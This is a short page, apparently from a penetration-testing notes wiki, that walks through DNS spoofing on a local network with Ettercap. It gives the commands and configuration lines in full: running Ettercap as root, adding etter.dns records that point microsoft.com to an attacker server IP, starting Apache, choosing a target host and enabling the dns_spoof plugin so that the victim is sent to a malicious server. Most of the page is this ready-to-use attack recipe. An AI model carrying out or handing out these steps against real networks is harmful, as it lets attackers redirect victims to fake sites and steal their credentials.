DNS

DNS Spoofing

Domain Name Server (DNS) spoofing, or DNS cache poisoning, is an attack involving manipulating DNS records to redirect users toward a fraudulent, malicious website that may resemble the user's intended destination.

Practical

Modify etter.conf

sudo nano /etc/ettercap/etter.conf

# Change the [privs] value to 0
ec_uid = 0
ec_gid = 0

# Now scroll down until you find the heading that says Linux and under that remove both the # signs below where it says "if you use iptables".

Modify etter.dns

sudo nano /etc/ettercap/etter.dns

# Add the following lines for dns poisoning
microsoft    A    <Attacker Server IP>
*.mirosoft    A    <Attacker Server IP>

Start Apache2 Server

sudo service apache2 start

DNS Spoofing Using Ettercap

Start Ettercap

sudo ettercap -G

Scan for Hosts

Click on three dots in the right top corner

Click on Hosts -> Scan for hosts

List Scanned Hosts

Click on three dots in the right top corner

Click on Hosts list

Add Targets

Select the target and Add to Target1

Activate dns_spoof Plugin

Click on three dots in the right top corner

Click on Plugins -> Manage plugins

Double click on dns_spoof

Now when the victim visits the microsoft.com then he/she will be redirected to our malicious server.

REFERENCES

https://null-byte.wonderhowto.com/how-to/tutorial-dns-spoofing-0167796/

PreviousARP NextVoIP

Last updated 9 months ago